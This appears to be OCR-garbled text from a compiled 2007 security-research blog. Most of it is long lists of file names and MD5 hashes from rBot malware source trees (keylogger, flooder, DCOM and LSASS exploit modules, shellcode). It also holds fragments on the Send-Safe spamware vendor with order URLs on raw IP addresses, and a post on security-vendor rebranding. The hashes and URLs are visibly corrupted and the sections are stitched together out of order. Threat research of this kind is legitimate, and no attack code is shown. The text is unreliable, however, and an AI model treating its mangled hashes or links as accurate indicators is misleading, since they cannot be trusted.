netutils.cpp 
70b40e4861703f1482658d9c93fadd8e 
netutils.h 
alc9f03b3643cb4fa07cd9ab4e8f6609 
ntpass.cpp 
116316adcda1803310d08fcOf02b6af9 
ntpass.h c042b743f9138a808368d1a849d87cf8 
optix.cpp 
af712af62fe9331e42205fca8f911373 
optix.h 
3001e7bce448e97fb0c36d17d8d3bb72 
passwd.h 02ea53dd9d277e5c30d40f4e8d1b622e 
pingudp.cpp 
deb2ca9a2d5d0a886f3b5a57a520d31b 
pingudp.h 
6c584d98d0f1f0cc87039c32556009f5 


processes.cpp 
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c6e71ff6e02efeaf419aeal 8ab6dee842 
processes.h 
€6610dd1b2287db779396c2a1125d0a4 
psniff.cpp 
€043db547ea8d03bdb321456b3237bdd 
psniff.h Oea96cb2476fe3e5b65c490d8a042da2 
rBot.cpp Oe666cce8eb834fa8c28fd1df857fe2a 
rBot.dsp 9af6140268c5c9239ed611764c0edb94 
rBot.dsw 37a2056d806c2c07d6a5e0ad7a9b75a0 
rBot.h 

460d5cc6152a947015869658510b5b5e 
rBot.ncb elaf23b5b192cd2a3df407350574b27c 
rBot.opt e39d121e1f2ff05484f5933d7d8acd2a 
rBot.plg f3c8f58e8012131ecceb985509d53da2 
redirect.cpp 
065bab43fe7e2cee32a608c0e1359498 
redirect.h 
e50dabdc477b3d4b943b0e0b1865e739 
remotecmd.cpp 
6bb024af9fa0eac0e9b258c1d9563af9 
remotecmd.h 
a2f97d6c8d45cbcc090a5c2e3403d9e4 
rndnick.cpp 
fedc5cf0b0949c8825fa335443664571 
rndnick.h 

7a25f4fa942faab1bb2308cb1559f472 

scan.cpp 4a4ac4fa240702cb90ec1ldcc3cec8fac 
scan.h 

3d1f51c52cb0aead9a2899eb96ae8cd6 
secure.cpp 
40419ff85af8079e7b99376761lacea85 

secure.h dba2b38530b058423f91883de579e459 
shellcode.cpp 
700e4ead9214cd2288cc879a3311a518 


shellcode.h 
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cal4f267b73bc867b075ca56f524d52e 
socks4.cpp 
1c47f1b0db7b82ea47f27e8d96e7447a 
socks4.h 603ded79fbce28cc17da923839c93438 
sub7.cpp e€3661739128b71d8b6b044bf30cec920 
sub7.h 
c60800f9fecb35bb27384594b46feb22 
synflood.cpp 
3384fadbafbed4ae6fa7dd003dd49b44 
synflood.h 
37d28b14d17e97ae0b1a674c9a2808d3 
sysinfo.cpp 
2972142d5c2881ac5d87b91a6ca7823d 
sysinfo.h 
fe9ff90487836b10a0f0fF3332558d3f 
tcpflood.cpp 
dd12816e442003152d2f65d42ce7eeb8 
tcpflood.h 
a9165cc828d623c51c297ec888803d9F 
tcpip.h 
d34a55bef016a45671781d8c6040c502 
tftpd.cpp 
4a0762987b27a8fd946431a160ab583e 
tftpd.h 
1f0c9b684e0050cd04f4bb62a424bddd 
threads.cpp 
af54d34aacd72ef0f4f059374731beb1 
threads.h 
ac7ffc0341056ea22da287374a77406a 
upnp.cpp 0b10a587e353e06c7ab81f6f74861086 
upnp.h 
6be3f6b1cfecla51673271021f67cab6 
visit.cpp 
508c60dd5a86011351a2079c9271cadc 
visit.h 
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4b1a61d58dac2376c0f51253be5746c6 
webdav.cpp 
3b0fb2d9a7499f1710ef4e7077858533 
webdav.h cblccbbb8ab3884e8e40ddb76a386bad 
wildcard.cpp 
8785f287656995d8621d455ac7e04ab7 
wildcard.h 
64fa15a50564415d397166c3d0aec0a6 
workstation.cpp 
9de1e00419bba9d84a577336ee127a4e 
workstation.h 
d16ef3f05e153e67803fba8d67532dal 
kuang2.cpp 
fa21f1c42b07614558c2fc5e4d9c429a 
kuang2.h 61b43ebcd17e59fb21e0831d5ad50b22 
scanner.cpp 
aedfef4bd234a6df81cdeab327cf6718 
advscan.cpp 
5f4aa4c0fé5cdf8ede59c0d62fdb65le 
advscan.h 
c67d944559e747clee795c57fb616d8d 
aliaslog.cpp 
826a551d0689a4e0846977a91c5d0fe6 
aliaslog.h 
52307a78ef96b5920f5edc93785166c6 
authors.txt 
5e70b680fcdafdbbd86d5b010dbb8b87 
autostart.cpp 
306dd702bbb1613d95cObb1d8c95ae92 
autostart.h 
ce33622adfc7b6e1543361c2a206229f 
avirus.cpp 
15eae314484b841cc21e6698a504d175 
avirus.h e55a156d28fde56a0bb05fc599dafecf 
beagle.cpp 
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45ca74ec0aa5d493533ea48bccc7f890 
beagle.h 76fa5d92efdffaadb93a416dc5ffbaf8 
capture.cpp 
8131417a0ade8b0cd43a6b1a441022dd 
capture.h 
1a27e95a9451b7b9fde4dd31labbe40c4 
cdkeys.cpp 
3f24656c7e76d36b031a0501f0df9693 
cdkeys.h 10199c0132621d0f86774ae3ea965f6c 
configs.h 
e955fbad83db473e46960b909b972a10 
crc32.cpp 
3771c5b3f6992c43c0e12a57c41a727e 
crc32.h 
1cd0adeb14bdd0dcbc3fe66a5fe2fed9 
crypt.cpp 
f8d56522e7015cff349715794104c50f 
crypt.h 
O0e8cd32d6c5dbb0546c57d7fd213b365 
dameware.cpp 
f14a8d491f640cb67983ce00b78480d2 
dameware.h 
c5f45e22e790da8dd52d90dd4841b5c7 
dcc.cpp 
bc19d35982b17f731a59c62b1c14c84d 

dcc.h 
€44c57141c37593156064072bd6570c2 
dcom.cpp 4e471cd272ce08f686628e4a9a3309db 
dcom.h 
b2792e423f3ec732793723d53a0e12c8 
dcom2.cpp 
e44f7e7a29eb230cd782e5b962ff807a 
dcom2.h 
€9548b20f8d3d955969a8b515b426db4 
ddos.cpp ed0c9b5120f45a2ccb3572139a7d0061 
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216.153.170.110:8088/vti_sys/order.php?product=sspc 
216.153.170.110:8088/vti_sys/order.php?product=ssel 
216.153.170.110:8088/vti_sys/order.php?product=ssalonesite 
67.118.79.234:8088/vti _sys/order.php?product=ssim 


[7]More info about [8]Send-Safe.com, a [9]Spamware vendor that’s vertically integrating 
in the spamming market. 


. http: //ddanchev. blogspot .com/2007/10/managed-spamming-appliances-future-of .htm 


. http: //ddanchev. blogspot .com/2007/07/average-online-time-for-phishing-sites.htm 

| 

. http: //ddanchev. blogspot .com/2007/10/fast-fluxing-yet-another-pharmacy-scam.htm 

| 

| 

| 

. http://www. spamhaus.org/rokso/listing.1lasso?-op=cn&spammer=Ruslan/,20Ibragimov/420/%20send- safe. com 


. http: //spamkings.oreilly.com/archives/2005/02/vint_cerf_on_th.htm 


1 
2 
3 
4 
5 
6 
7 
8 
9 


3.11.5 Rebranding a Security Vendor (2007-11-05 03:39) 
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ddos.h 
b3d1a37538db741825844dfb3df4f7 2f 
defines.h 
ef3f412b2b20bc4ae68776587f6c1fdf 
download.cpp 

664845639 laff5fob872236bcb0af8b5 
download.h 
772d831e6b39c79d829d9fc8cdb713a6 
driveinfo.cpp 
9dc1c0a866f906b262d258a8ca3eda9e 
driveinfo.h 
8f57049be20497bca61df57618ba9cfe 
ehandler.cpp 
7f85493a9bae6ab2dad717786502328c 
ehandler.h 
3644e5ec559d2670426689d1c80b0509 
externs.h 
de46029aee975069ab6fb9ef3515c2b42 
findfile.cpp 
40273104f4bc7ebcd7f0b87673f39638 
findfile.h 
d21e9ef8155cf3c9efcbe8ec4244357a 
findpass.cpp 
21f63de47f8f0fdb9f989d6463a89032 
findpass.h 
1fecf202e0ebd30610d74f842979c82c 
fphost.cpp 
3b4e036a97dfabcd636e63245831853a 
fphost.h 7269b3d4234fcbc5da07695ae3483c1b 
functions.h 
000d108172efd4ble8a4af8a60cal7de 
globals.h 
65ad95c53b660b0fc4bad98f2d2d4b22 
httpd.cpp 
3b321d4bdc50573e2722291788667763 
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httpd.h 
288553599c70aa95ec2119d78938578a 
icmpflood.cpp 
5caa21a85ea20819ca40e7454f11be33 
icmpflood.h 
4462c6318220648820316848deb124fd 
ident.cpp 
9f22919c49284e257ce0ed79dbd29bf6 
ident.h 
56c539d97aec2572f6fc9349edd7d9c2 
includes.h 
4cb2e277eaee6a70467b72db23e16670 
irc send.cpp 
6a084f0b44846cfbd50498b8b03687e3 
irc _send.h 

30d0176a5e9b6e3e5al 9bfb1fcda444c 
keylogger.cpp 
€569621c990b37affc9cf4b050f2df2e 
keylogger.h 
a00df900cf42e596e4c48e8a9d52afed 
kuang2.cpp 
ce5f0f4d470b760d2276fab309878420 
kuang2.h fc3343ecc92dba61f83260bbb93aa70c 
list.txt 50594305fa90c9596c69be1ad1a454a4 
loaddlls.cpp 
1186093534flcfb47efd3e4e922c95d4 
loaddlls.h 
4703f87679db3655151348076c41a83a 
misc.cpp 4770444fdc75d9baac93b3bc29bfa51f 
misc.h 
f035c1642a8e3ff49ff19bb1be316333 
mssql.cpp 
2ea31bdb396d29250fd6fédbdf231433 
mssql.h 
742394ed531laab2ecc958daf5305723e 
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mydoom.cpp 
cfcbabd00798a130fe0366975a9a0f50 
mydoom.h c7d0eda136c75da543c4al14f9c28b7d6 
net.cpp 
a1193f36f9bc058f9306fa922b957ed9 
net.h 
b1bb95c11a47aa666acd9a5929861726 
netbios.cpp 
904a4d19d94ab75dbe67e628831c0ef9 
netbios.h 
dd155768799804528c6cd19d67df42a3 
netdevil.cpp 
892dd8fd4a08ede457f9346b5edd832e 
netdevil.h 
a89982a588e965ce01448c60a81585b3 
netutils.cpp 
7€91597c24a39f15682b255dc78973d5 
netutils.h 
ccbb3172d63a28dae5a98af36c27e354 
nicklist.h 
e9eb7e67eb89f60039d17c3fc5609ab4 
optix.cpp 
5ab6d1017b7380586127050009bec5a9 
optix.h 
3421ea53b60d9533328808627b869ccc 
passwd.h c300d3b2a40113092a84186424b56079 
peer2peer.cpp 
7fa712db3241c69112b7a853516ff0f5 
peer2peer.h 
920cce5177elfcaacdf28ec4aalc18b1 
pingudp.cpp 
8092a2919dab44410b1802c1b31ddc7a 
pingudp.h 
b86f6921f7a720d6e7b204fbeb34e8d4 


processes.cpp 
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Off6cd6325e6f63db3d44355843d4b08 
processes.h 
f7c75cccfaaef0c459ac6c020cf6808d 

psniff.cpp 
c4eb189f05d2a7ff652afeOcdab3bd17 

psniff.h 5eebe93de4e03bf0bb118e35997743a9 
rBot.cpp 44c7b9207eeb15bed6ada960a4b68da8 
rBot.dsp e2de7c5a4460d5b046bf6c33fbc9e457 
rBot.dsw 37a2056d806c2c07d6a5e0ad7a9b75a0 
rBot.h 

6d17278915220464f9502b8ce5451f67 
redirect.cpp 
dacd372119ae0ab1750b3e2f83382a52 
redirect.h 
9e5349d6d6944a179b9ca7a7d847c335 
remotecmd.cpp 
35014f60da50aef7b6a7al19ff893247a 
remotecmd.h 
1fb45492f87a66e34be6b4ca55b1cf86 
rlogind.cpp 
2f26ca25770b2f22201d40541b1d9d29 
rlogind.h 

dbc479f2720ba03cb946419fbef774e0 
rndnick.cpp 
89c13d836afadc25fb95c4d69bb627c5 
rndnick.h 
3cbe632d4ca6f152ca2a13bb1561d292 
scan.cpp 66cOcfe5563eb8191fda0d9a6781acOf 
scan.h 

6236be771c0c88df937f75845a064f12 
secure.cpp 
0385d82f95182e40ed61329826da5934 
secure.h 231le3dd2ba09a8bbc039caf634e5306d 
session.cpp 
82e74c83142171a4998ca76b20b4177¢c 
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session.h 
5f8c353634b560052a5ebee5ef27ae32 
shellcode.cpp 
b16b4f6éaaf8a8c11822c931dc84f77d4 
shellcode.h 
cal14f267b73bc867b075ca56f524d52e 
socks4.cpp 
7d9d022be20b4dca6a204f8c1e027dbb 
socks4.h b103f307ff02cd98fe2bfbecbd19c011 
sub7.cpp ab416250dc7c47a499f6dd28b99elac0 
sub7.h 
c60800f9fecb35bb27384594b46feb22 
synflood.cpp 
d860c99e49b7c19e49c61a21baf0f66b 
synflood.h 
78df095c5aa59a0bfaa783e6edd38d0d 
sysinfo.cpp 
17375b805605f717739a8085be3f21f3 
sysinfo.h 
38774eadb5ba365df293ba4a222c4163 
tcpflood.cpp 
dd12816e442003152d2f65d42ce7eeb8 
tcpflood.h 
a9165cc828d623c51c297ec888803d9f 
tcpflood2.cpp 
65eaf8f6e8c69ed36fd175cc89d1644f 
tcpflood2.h 
f8307cc6251c3fce249a794314103804 
tcpip.h 
41b08a9fae20869c4eca0bae6dc2d971 
tftpd.cpp 
e11ccc19202c00c861e229c83b1907a2 
tftpd.h 
01a889b931f69e44f3a9421e16c327bc 
threads.cpp 
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cbe0ba8b50028430092c7f0e78841b71 
threads.h 
4414d669e296201e23ecfabb616f7536 
upnp.cpp 02d082807cbb76759600d516143a214b 
upnp.h 
6be3f6b1cfec1la51673271021f67cab6 
visit.cpp 
27fb4f513a944ba46a905c796bce0c81 
visit.h 
766e4add98e2cb96bd37e87f4d9dfff9 
webdav.cpp 
3b0fb2d9a7499f1710ef4e7077858533 
webdav.h cblccbbb8ab3884e8e40ddb76a386bad 
wildcard.cpp 
8785f287656995d8621d455ac7e04ab7 
wildcard.h 
64fa15a50564415d397166c3d0aec0a6 
workstation.cpp 
3be726c7f2e4404b198ff5f7042318c7 
workstation.h 
d16ef3f05e153e67803fba8d67532dal 
advscan.cpp 
cf50aa59a070362eb668eea1806ab648 
advscan.h 
c67d944559e747clee795c57fb616d8d 
aliaslog.cpp 
826a551d0689a4e0846977a91c5d0fe6 
aliaslog.h 
52307a78ef96b5920f5edc93785166c6 
autostart.cpp 
306dd702bbb1613d95c0bb1d8c95ae92 
autostart.h 
ce33622adfc7b6e1543361c2a206229f 
avirus.cpp 
15eae314484b841cc21e6698a504d175 
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avirus.h e55a156d28fde56a0bb05fc599dafecf 
beagle.cpp 
45ca74ec0aa5d493533ea48bccc7f890 
beagle.h 76fa5d92efdffaadb93a416dc5ffbaf8 
capture.cpp 
8131417a0ade8b0cd43a6b1a441022dd 
capture.h 
1a27e95a9451b7b9fde4dd31labbe40c4 
cdkeys.cpp 
3f24656c7e76d36b031a0501f0df9693 
cdkeys.h 10199c0132621d0f86774ae3ea965f6c 
configs.h 
717539fba53121bdf74fdc568b10ed92 
crc32.cpp 
3771¢c5b3f6992c43c0e12a57c41a727e 
crc32.h 
IcdO0adeb14bdd0dcbc3fe66a5fe2fed9 
crypt.cpp 
f8d56522e7015cff349715794104c50f 
crypt.h 
Oe8cd32d6c5dbb0546c57d7fd213b365 
dameware.cpp 
f14a8d491f640cb67983ce00b78480d2 
dameware.h 
c5f45e22e790da8dd52d90dd4841b5c7 
dcc.cpp 
bc19d35982b17f731a59c62b1c14c84d 

dcc.h 
€44c57141c37593156064072bd6570c2 
dcom.cpp acea5e7fd1133f94c9e89756c5c0cc27 
dcom.h 
b2792e423f3ec732793723d53a0e12c8 
dcom2.cpp 
0ad20a541269c646caa86e8cef38d708 
dcom2.h 
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e9548b20f8d3d955969a8b515b426db4 
ddos.cpp ed0c9b5120f45a2ccb3572139a7d0061 
ddos.h 
b3d1a37538db741825844dfb3df4f7 2f 
defines.h 
9eae3f1d6d905a5561fa7a8860537336 
download.cpp 

664845639 lLaff5fbb872236bcb0af8b5 
download.h 
772d831e6b39c79d829d9fc8cdb713a6 
driveinfo.cpp 
9dc1c0a866f906b262d258a8ca3eda9e 
driveinfo.h 
8f57049be20497bca61df57618ba9cfe 
ehandler.cpp 
7f85493a9bae6ab2dad717786502328c 
ehandler.h 
3644e5ec559d2670426689d1c80b0509 
externs.h 
f7¢44e532aca3c1596e004ca03be6db8 
findfile.cpp 
40273104f4bc7ebcd7f0b87673f39638 
findfile.h 
d21e9ef8155cf3c9efcbe8ec4244357a 
findpass.cpp 
21f63de47f8f0fdb9f989d6463a89032 
findpass.h 
1fecf202e0ebd30610d74f842979c82c 
fphost.cpp 
3b4e036a97dfabcd636e63245831853a 
fphost.h 72b9b3d4234fcbc5da07695ae3483cl1b 
functions.h 
000d108172efd4ble8a4af8a60cal7de 
globals.h 
65ad95c53b660b0fc4bad98f2d2d4b22 
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httpd.cpp 
3b321d4bdc50573e2722291788667763 
httpd.h 
288553599c70aa95ec2119d78938578a 
icmpflood.cpp 
5caa21a85ea20819ca40e7454f1l1lbe33 
icmpflood.h 
4462c6318220648820316848deb124fd 
ident.cpp 
9f22919c49284e257ce0ed79dbd29bf6 
ident.h 
56c539d97aec2572f6fc9349edd7d9c2 
includes.h 
d6478f56ee26ac92c9b87cbe49fal446 
irc send.cpp 
6a084f0b44846cfbd50498b8b03687e3 
irc send.h 
30d0176a5e9b6e3e5al9bfb1lfcda444c 
keylogger.cpp 
€569621c990b3 7affc9cf4b050f2df2e 
keylogger.h 
a00df900cf42e596e4c48e8a9d52afed 
kuang2.cpp 
ce5f0f4d470b760d2276fab309878420 
kuang2.h fc3343ecc92dba61f83260bbb93aa70c 
loaddlls.cpp 
1186093534flcfb47efd3e4e922c95d4 
loaddlls.h 
4703f87679db3655151348076c41a83a 
Isass.cpp 
07ea32a50c76271a2c0023a3811ad526 
Isass.h 
5b9d615744a8d6f4b2c9c19d2aed46ef 
misc.cpp 4770444fdc75d9baac93b3bc29bfa51f 
misc.h 
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f035c1642a8e3ff49ff19bb1be316333 
mssql.cpp 
2ea31bdb396d29250fd6fédbdf231433 
mssql.h 
742394ed531laab2ecc958daf5305723e 
mydoom.cpp 
cfcbabd00798a130fe0366975a9a0f50 
mydoom.h c7d0eda136c75da543c4al14f9c28b7d6 
myshellcode.asm 
ce26d85257d8fa2c68a5ad6012ed010c 
net.cpp 
a1193f36f9bc058f9306fa922b957ed9 
net.h 
b1bb95c11a47aa666acd9a5929861726 
netbios.cpp 
904a4d19d94ab75dbe67e628831c0ef9 
netbios.h 
dd155768799804528c6cd19d67df42a3 
netdevil.cpp 
892dd8fd4a08ede457f9346b5edd832e 
netdevil.h 
a89982a588e965ce01448c60a81585b3 
netutils.cpp 
7¢€91597c24a39f15682b255dc78973d5 
netutils.h 
ccbb3172d63a28dae5a98af36c27e354 
nicklist.h 
e9eb7e67eb89f60039d17c3fc5609ab4 
optix.cpp 
5ab6d1017b7380586127050009bec5a9 
optix.h 
3421ea53b60d9533328808627b869ccc 
passwd.h c300d3b2a40113092a84186424b56079 
peer2peer.cpp 
7fa712db3241c69112b7a853516ff0f5 
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of confused positioning. 


[1]PandaSoftware’s recent rebranding to PandaSecurity comes as a smoothly executed exam- 
ple of the process, as it needed to take advantange of the entire [2]marketing toolset in order 
to communicate their new vision, mostly a sound repositioning strategy emphasizing that the 
company’s core competency is not software in general, but IT security. As in every other mar- 
keting campaign aiming to achieve such effect, the business lingo used affects the prospective 
audience of the campaign, be it the U.S or the EMEA markets or even better in respect to glob- 
alization - try to influence both with a clear vision, namely that "Prevention is better than the 
cure". The question from a marketing perspective always remains - is it a brand with a mission, 
or is it a mission with a brand, and isn’t the second a better socially oriented positioning than 
the standard practice? 


Meanwhile, here’s another proof that building a solid brand results in sustained brand equity, 
thereby attracting potential acquirers’ interest which is [3]the case with McAfee’s recent [4]ac- 
quisition of ScanAlert for $51M. What they’re buying is not the technology behind the company, 
a daily managed penetration testing process, but [5]ScanAlert’s brand and clients list. 


Related posts: 

[6]Microsoft’s Forefront Ad Campaign 

[7 ]Microsoft’s OneCare Penetration Pricing Strategy 

[8]Microsoft in the Information Security Market 

[9]Overachieving Technology Companies 

[10]China’s Information Security Market 

[11]Spotting valuable investments in the information security market 
[12]Look who’s gonna cash for evaluating the maliciousness of the Web? 
[13]Taking Down Phishing Sites - a Business Model? 

[14]Take this Malicious Site Down - Processing order.. 

[15]Budget Allocation Myopia and Prioritizing Your Expenditures 
[16]Valuing Security and Prioritizing Your Expenditures 


1. aps / Tw. pandasecurity, coa/about trad] 
_hetp:/ /wuv. youtube. con/vatch?v=pss79Z9n4 

. http: //www.mcafee. com/us/about/corporate/mcafee_scanalert. html 
_netp:/ /news. yahoo. con/s/ap/20073030/ap on, bs te/ncatee, scanaler® 


ttp://www.mcafee.com/us/local_content/media/mcafee_scanalert_acquisition_overview.pdf 


Reece acres cae 0 os ei seee ance carina 

_hvtp://adanchey. blogspot. cou/2006/06/nicrosofts~onecare-penetration-pricing htall 

ttp://ddanchev.blogspot.com/2006/05/microsoft-in-information-security.htm 

_hetp://adanchey. blogspot. cou/2001/02/overachi ving tecnologj~companies. neal 

10, Fas ace chee sgepes coe 2005 10 /cxsaaatsceaedoncsecusiey mactec cel 

11. http: //adanchev. blogspot -con/2006/04/spotting-valuable~investeents-in htm 
coy rcachr ploasoe con tte) acon taco goena eae toe evel ag ne 


ttp://ddanchev. blogspot .com/2007/04/taking-down-phishing-sites- business .htm 


ttp://ddanchev. blogspot .com/2007/03/take-this-malicious-site-down.htm 


15. http://ddanchev. blogspot .com/2006/07/budget-allocation-myopia-and.htm 


ttp://ddanchev. blogspot .com/2006/05/valuing-security-and-prioritizing-your.htm 
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peer2peer.h 
920cce5177elfcaacdf28ec4aalc18b1 
pingudp.cpp 
8092a2919dab44410b1802c1b31ddc7a 
pingudp.h 
b86f6921f7a720d6e7b204fbeb34e8d4 
processes.cpp 
Off6cd6325e6f63db3d44355843d4b08 
processes.h 
f7c75cccfaaef0c459ac6c020cf6808d 
psniff.cpp 
18ec37e4b6d99c821a5f38544dd27eld 


psniff.h 5eebe93de4e03bf0bb118e35997743a9 
rBot.cpp a300c9e235ed508c767e67328bc5fb93 
rBot.dsp f7bf3cf00b4a01180be5aeb5c1591508 
rBot.dsw 37a2056d806c2c07d6a5e0ad7a9b75a0 


rBot.h 
6d17278915220464f9502b8ce5451f67 


rBot.ncb 4d0c61a00017dd64419e7a518318fe4a 
rBot.opt 02242775c83c3a496c512d1532efd115 
rBot.plg 5b7a3363e3480dd085188beca49958cf 


redirect.cpp 
dacd372119ae0ab1750b3e2f83382a52 
redirect.h 
9e5349d6d6944a179b9ca7a7d847c335 
remotecmd.cpp 
35014f60da50aef7b6a7al19ff893247a 
remotecmd.h 
1fb45492f87a66e34be6b4ca55b1cf86 
reqbuf.bin 
2d8fe918744e0f97f435f973d2af0be4 
rlogind.cpp 
2f26ca25770b2f22201d40541b1d9d29 
rlogind.h 
dbc479f2720ba03cb946419fbef774e0 
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rndnick.cpp 
89c13d836afadc25fb95c4d69bb627c5 
rndnick.h 
3cbe632d4ca6f152ca2a13bb1561d292 
scan.cpp 66cOcfe5563eb8191fda0d9a6781acOf 
scan.h 

6236be771c0c88df937f75845a064f12 
secure.cpp 
0385d82f95182e40ed61329826da5934 
secure.h 231le3dd2ba09a8bbc039caf634e5306d 
session.cpp 
82e74c83142171a4998ca76b20b4177¢c 
session.h 
5f8¢353634b560052a5ebee5ef27ae32 
shellcode.cpp 
b16b4f6éaaf8a8c11822c931dc84f77d4 
shellcode.h 
cal4f267b73bc867b075ca56f524d52e 
socks4.cpp 
7d9d022be20b4dca6a204f8c1e027dbb 
socks4.h b103f307ffO2cd98fe2bfbecbd19c011 
sub7.cpp ab416250dc7c47a499f6dd28b99elac0 
sub7.h 

c60800f9fecb35bb27384594b46feb22 
synflood.cpp 
d860c99e49b7c19e49c61a21baf0f66b 
synflood.h 
78df095c5aa59a0bfaa783e6edd38d0d 
sysinfo.cpp 
17375b805605f717739a8085be3f21f3 
sysinfo.h 
38774eadb5ba365df293ba4a222c4163 
tcpflood.cpp 
dd12816e442003152d2f65d42ce7eeb8 
tcpflood.h 
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a9165cc828d623c51c297ec888803d9f 
tcpflood2.cpp 
65eaf8f6e8c69ed36fd175cc89d1644f 
tcpflood2.h 
f8307cc6251c3fce249a794314103804 
tcpip.h 
41b08a9fae20869c4eca0bae6dc2d971 
tftpd.cpp 
c7aad47ea1152c0e4d21a93702c43710 
tftpd.h 
01a889b931f69e44f3a9421e16c327bc 
threads.cpp 
cbe0ba8b50028430092c7f0e78841b71 
threads.h 
4414d669e296201e23ecfabb616f7536 
upnp.cpp 02d082807cbb76759600d516143a214b 
upnp.h 
6be3f6b1cfecla51673271021f67cab6 
visit.cpp 
27f64f513a944ba46a905c796bce0c81 
visit. 
766e4add98e2cb96bd37e87f4d9dfff9 
webdav.cpp 
3b0fb2d9a7499f1710ef4e7077858533 
webdav.h cblccbbb8ab3884e8e40ddb76a386bad 
wildcard.cpp 
8785f287656995d8621d455ac7e04ab7 
wildcard.h 
64fa15a50564415d397166c3d0aec0a6 
workstation.cpp 
3be726c7f2e4404b198ff5f7042318c7 
workstation.h 
d16ef3f05e153e67803fba8d67532dal 
crc32.c 
c2e731d846a546c70/7ffbb7e35a8df40 
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crc32.h 

372bf1d98a03d788ca4f072b27825703 
ntpass.cpp 
bf24e5142a6dccee1926f9337f38c88a 

rBot.cpp 3f204fd5c79f1b2912948519ac9deaf9 
rBot.dsp df4cb36855f4446f6a5f44bcf28937dc 
rBot.dsw 297b47293fd3464a579d3921ff164312 
rBot.ncb 203e78494f93224507f6d140f9c02c52 
rBot.opt 73a0f285619d87d915a3lee0b344f7da 
readme.txt 
cc84b2a16859d350672c5507a96e63f3 

tcpip.h 

f2d929e1278ad3f507a5d6dc59fb98e8 

FSG.EXE 
ce5d1f3074a96b78ebd2565e992492cc 

rBot.obj 4f6779f027e07ae285e603703ff56032 
rBot.pch ebe6d15865535adc42ddelc8edae81c0 
vc60.idb cd94b3e01085668d38f5a74313fee4b5 
crc32.c 

c2e731d846a546c707ffob7e35a8df40 

crc32.h 

372bf1d98a03d788ca4f072b27825703 
dnsxpl.h 9031a4f369b6514c7d530c3e15175f4e 
dnsxplc.cpp 
fc34d615a9c2dc9caed5cf7ea5438045 

dnsxpl _c.c 
8c064aff02139a68775a3b538995aaa3 

dnsxpl _s.c 
d64bd289e74eebc17cd908c1fa06cf7b 
rBot032.cpp 
247e2ea1354a86cbe0b9724c9b825d4d 
rBot032.dsp 
22821a5fa72104f0fd947d1b022a2ee7 
rBot032.dsw 
8¢589477e840a49afc4b633523970153 
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rBot032.ncb 
254cb82b5853c010062f0638202c2920 
rBot032.opt 
d21211b429ada70f375946329612d65c 
rBot032.plg 
cae9292d6fb6c33c63a25ad2cb980dd9 
readme!!!.txt 
€3549929e413aab727e4ef86d6525b02 
tcpip.h 
f2d929e1278ad3f507a5d6dc59fb98e8s 
advscan.cpp 
60ae527c7567b410e7a87bedecd9c609 
advscan.h 
5c5f7fo1lb7ed612771lab2bdcOlab9f9b 
banner.cpp 
le2bdef556281404cc9a3321aa7a407c 


banner.h f27746db68f05c71925ladba69d0c4bb 


commands.cpp 
c4702ab5b7645d68594ce1b01b61fae6 
commands.h 
3d74b4e858e39c5eb992e9034839f195 
configs.h 
384018e74e8ccf78c9595bd5de3b3e4c 
configss.h 
d0d3ea271432d67b62d665d922d4d9df 
crypt.cpp 
b1824d57a8f8d795c26576a21719481e 
crypt.h 
c2edef9177543e1b8a8611d347d99b66 


dcom.cpp af90ccde9f7bbcaef92e9d6abee25af3 


dcom.h 
1515fd93ad7196026d7679f5b478alab 
defines.h 
b1c2e01740f8ea311ae258895d19777b 


download.cpp 
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2b17d55de73f19dfa454d78dd579a966 
download.h 
d9157dc8f81483e56884f62a6473d717 
driveinfo.cpp 
5fef4e7b2d90bc41ee3aa523b6192bc6 
driveinfo.h 
0e4b63578110edb7511798fbb69827 Off 
externs.h 
77a25a7cOc36bd46f24b54fd42dbd2e1 
fphost.cpp 
c040fa56ab655e94c35c9cf144b688d3 
fphost.h eff3d1ba2e46287f3b0d01571aa2ac73 
ftpd.cpp e06bcc127636ebf60b6ed52bb321a617 
ftpd.h 
da4f3d35010ladb59be91cal6fec3be2 
fu.cpp 
4c12e14985891ba6e/7fe1ld978ccf0756 
fu.h 
5ee58b9c18fe86d14654fe31c1793606 
fudll.h 
440e034c517d25b7039bcc1f86f064a3 
functions.h 
774de6ce4ddfc9ef4cOaaa9fcb3bd801 
includes.h 
14095692f98b3bbb5a133b6cdbb44f51 
info.cpp 459cabebf510caf14b0c87fb8441fcfa 
info.h 
70994ba4e7570710ddc3a4c91e494c22 
ioctlcmd.h 
278822516d1890ad95db1872d6626efc 
ipswitch.cpp 
O0d95f7ddedfcf755b4f2de8f7ae54d59 
ipswitch.h 
a6a74a334f51bd97d5ae55cel5e2f442 


irc.cpp 
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9eec61cb505042a83144cdf232ef3d43 
irc.h 
59e3873c090f275fff0ea52e3cc79dfa 
keylog.cpp 
a6d6a69e440864e350e9d13f5b5db023 
loaddlls.cpp 
bfbfe5f78f429b3898a9100d7ad2bfd3 
loaddlls.h 
8f0c2c63112210df17b3d53262ca7839 
Isass.cpp 
4615f57239b16915f7f24594c2fe7de7 
Isass.h 
8d3db94c754b7422e35ed423204b902b 
ms04-007.cpp 
3134f6a18149e915231d6616b99e8f48 
ms04-007.h 
b9321a4d186254af897035566e86e114 
ms05-039.cpp 
f0a5450feab2d24d0128c240d99eba79 
ms05-039.h 
35d0b2398684bc150902d6f2ccd07bbf 
mssql.cpp 
bb15434cef41ca090a95a39c444d92c5 
mssql.h 
700d257c41a1d9ec1e4795c940a7bace 
navicopa.cpp 
f3a07da990c2b0a84092311f21845eb3 
navicopa.h 
ba3f8f43a980f3b3bc17b4d93827ed76 
netapi.cpp 
63f630c0f81f188cc14d241472eac7cd 
netapi.h 4aeaab3a7be1913de7fe9fe0e6d27 76d 
netapi2.cpp 
1968bbb376ecc8e1642af7bf937e7dce 
netapi2.h 
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d82f8089bf608388df26de9bc62d1b62 
netbios.cpp 
fd3958d6elaf752889a20d6be38e6f01 
netbios.h 
10a1535d311b113b8702f6789d1ad1b3 
netdde.cpp 
ea06c222b3cf4fd73aced46b38f64097 
netdde.h 717faalb591f7b9e0dbca80c3393ac6f 
netstatp.cpp 
820e8648707f632b3d90f9f3ab22e0db 
netstatp.h 
1ce3bb0d2241980dc247ceb1b14768e4 
netutils.cpp 
40f70e38e86618fd0d410a35141b6128 
netutils.h 
d9f9bd3a26e840e4c54477cbecb2247d 
passwd.h a64a53096b26140f039f7cd09e8510d7 
pnp.cpp 
79c6418ae17a95f0896696e0cd8ea3fc 
pnp.h 
0d164366352a45fed1ld5baaada0bce02 
processes.cpp 
4a345dd631db41ladbf016219bfd07bf6 
processes.h 
d648e2988a7cbd350564502a8e80f30b 
protocol.cpp 
